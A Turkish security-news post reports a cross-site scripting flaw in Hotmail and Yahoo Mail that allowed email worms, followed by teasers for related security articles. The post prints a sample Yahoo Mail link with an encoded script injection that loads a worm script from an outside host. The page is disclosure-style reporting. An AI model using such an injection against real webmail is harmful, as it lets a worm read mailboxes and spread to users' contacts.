Hotmail ve Yahoomail virus tehdidi altında

Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.

Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

Paranoyaklar için Linux: Tinfoil Hat

sundance
28 Şubat 2002, 1 dakika okuma süresi

Bilgisayarınızda herhangibir şifre girerken rahatsız mı oluyorsunuz ? Bir başkasının bilgisayarına oturduğunuz zaman ilk onbeş dakika herhangibir keylogger var mı diye aramakla mı geçiyor ? PGP kullanmadığınız her e-mailin bir gün size soruşturma diye döneceğinden mi korkuyorsunuz ?

İşte sizin gibi normal vatandaşlar için bir Linux dağıtım Tinfoil Hat
Herhangibir keylogger kullanılmaması, PGP integrasyonu, şifrelerin ekrandan seçerek girilmesinden tutun da anti-tempest ekran renkleri ile herhangibir dijital kamera ile ekranın fotoğrafının bile çekilememesini sağlayan bir dağıtım... FZ, söz senin ;)

Web Güvenlik Topluluğu Buluşması - 14 Kasım

anonim
9 Kasım 2009, 1 dakika okuma süresi

Web Güvenlik Topluluğu tarafından düzenlenen web güvenliği etkinliğine web güvenliği ile ilgilenen herkes davetlidir.

Güvenlik Dedikleri

anonim
20 Nisan 2004, 8 dakika okuma süresi

Aşağıdaki yazı uzun zamandır güvenlikle ilgili gördüğüm en güzel belgelerden biri. Hiç bir teknik konu içermemesine karşın güvenlik felsefesini kavratmak amacıyla yazılmış ve amacına ulaşan bir belge. tbase.gen.tr sitesinin forumlarında gördüğüm bu yazıyı FM camiası ile de paylaşmak istedim:

Son yılların en gözde terimleri: İnternet, bilgi, hızlı ve kolay erişim, teknoloji Her şey her yerde ve her şey çok kolay Peki ya size ait birşeyler varsa ve öyle kalmasını istiyorsanız? İşte o zaman işiniz gerçekten zorlaşıyor. Herşeyin kolay olması için yaptığınız o kadar uğraşın çok daha fazlasını özel bilgilerin gizli kalması için vermek zorundasınız. Çünkü herkesin bildiği gibi yasak olan şeyler daha tatlıdır ve sizin yapılmasını istemedikleriniz başkalarının hedefleridir

Hacker´lar California´nın Elektrik Şebekesindeler

PCc0d3r
11 Haziran 2001, 1 dakika okuma süresi

Hacker'lar bu sefer ABD'nin California eyaletinin elektrik şebekesine dadandı. 25 Nisan'da şebekenin ana bilgisayarına giren sanal korsanlar 11 Mayıs'a kadar fark edilmemişler. Neyse ki sisteme önemli bir hasar verilmemiş (ki bunu yapabilecekleri noktalara dahi erişmiş hacker'lar).

FBI'ın yaptığı araştırmalara göre saldırının Çin'in Guangdong bölgesinden yapıldığı tahmin edilmekte. Ayrıca Santa Clara ve Tulsa'dan da olabileceğini söyledi yetkililer...